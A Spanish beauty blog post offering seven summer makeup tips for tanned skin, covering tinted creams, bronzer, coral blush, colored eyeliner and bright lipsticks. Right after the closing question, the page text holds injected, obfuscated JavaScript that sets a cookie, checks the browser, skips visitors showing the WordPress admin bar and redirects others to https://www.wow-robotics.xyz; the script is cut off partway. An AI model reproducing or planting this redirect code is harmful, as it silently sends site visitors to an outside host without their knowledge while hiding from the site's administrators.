maquillaje online

Hoy venimos con 7 tips o trucos de maquillaje para que los apliquéis este veranito.

Ya sabemos que con el buen tiempo comenzamos a broncearnos, las noches de verano en las terracitas, una cena con amigos, cualquier ocasión es buena para lucir nuestra piel más morenita. Así que hoy venimos con unos truquitos de maquillaje que creemos que os serán útiles para esta época estival.

Si has conseguido un poco de color, aprovéchalo, con el bronceado nuestro rostro tiende a no necesitar tanta cobertura como cuando utilizamos nuestra base de maquillaje habitual. Te recomendamos que pruebes con una BB/CC Cream o una crema hidratante con color, conseguirás unificar el tono aportando sólo una ligera cobertura lo que hace que sea muy cómoda para soportar el calor.

Sella la base de maquillaje o BB/CC Cream con unos polvos matificantes, conseguirás alargar la duración del maquillaje y retrasar la aparición de los molestos brillos tan frecuentes con el calor.

Si todavía no hemos conseguido broncearnos lo suficiente los polvos de sol o polvos bronceadores se convertirán en tu aliado. Aplicando el color gradualmente, comenzando en las sienes, el mentón y los pómulos, extendiéndolo hacia el centro del rostro con una brocha grande. La clave en la aplicación de los polvos de sol está en extenderlos sólo en las zonas donde el sol broncearía. A saber: mejillas, frente, barbilla y nariz.

En verano apetecen colores mucho más vivos, te aconsejamos que te atrevas con coloretes más atrevidos que con la piel bronceada nos ayudarán a conseguir unas mejillas más alegres. Utiliza un tono coral o anaranjado para darles vida a tus mejillas ya sea en tonos mates como satinados.

En los ojos prueba con lápices delineadores de colores para delinearte la mirada, despiértala y aporta un toque de alegría, prueba con varios tonos y encuentra así los que más te favorezcan.

Continuando con los ojos, os recomendamos sombras de ojos en tonos satinados, dorados, corales o anaranjados que os ayudarán a lucir el bronceado.

Para acabar atrévete con labiales fucsias o corales, tonos neón, que harán que resalte tu bronceado y aportarán alegría al rostro.

 

Cuentanos, ¿con cuál de estos tips te sientes identificada? ¿Soléis variar la gama de colores de vuestro maquillaje durante la época estival? var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone